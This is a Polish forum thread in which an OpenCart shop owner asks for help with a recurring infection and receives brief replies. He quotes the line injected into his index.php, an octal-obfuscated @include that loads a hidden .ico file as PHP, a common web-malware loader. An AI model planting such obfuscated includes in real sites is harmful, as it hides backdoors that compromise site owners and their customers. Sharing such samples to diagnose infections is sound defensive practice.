Drukowana wersja tematu

Kliknij tu, aby zobaczyć temat w orginalnym formacie

Forum PHP.pl _ PHP _ wirusy na sklepie

Napisany przez: Kryszic 15.10.2019, 12:28:18

cześć

nie wiem czy w dobry dział wszedłem ale mam następujący problem i jestem bezsilny

mam sklep na opencart wersja 3.0

i od jakiegoś czasu walczę z wirusami albo nadpisuję mi się plik index.php albo dodają się pliki do folderu public_html
zmiana hasła do serwera nie pomaga kod mam cały przeanalizowany wygląda na to, że jest czysty

mój komputer też jest czysty, mam jeszcze inne serwery i tam jest wszystko ok.

Akcja z dzisiaj: nadpisanie pliku index.php następującym kodem:

/*dbd7a*/

@include "\057ho\155e/\155ax\164er\0703/\144om\141in\163/m\141xt\145r.\160l/\160ub\154ic\137ht\155l/\143at\141lo\147/c\157nt\162ol\154er\057st\141rt\165p/\056db\1462f\06654\056ic\157";

/*dbd7a*/

dodatkowo na serwerze mam uruchomiony open base dir



Napisany przez: kapslokk 15.10.2019, 12:41:34

Cytat(Kryszic @ 15.10.2019, 13:28:18 ) *
kod mam cały przeanalizowany wygląda na to, że jest czysty


smile.gif A kto go analizował?

Napisany przez: Kryszic 15.10.2019, 12:48:13

programista

znaczy pewności nie mamy w 100%

ale czy tego typu działania (nadpisywanie plików) są związane ze szkodliwym kodem który mamy gdzieś na sklepie ?

Napisany przez: dublinka 16.10.2019, 06:58:06

Ameryki pewnie nie odkryje pisząc żebyś skontaktował się z jakąś firma od usuwania wszelkiego złośliwego kodu i która może wdrożyć jakieś zabezpieczenia. Przydaloby się napisać do twórców tegpo skryptu czy mieli podobne zgloszeni a bo być może jest gdzieś dziura

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)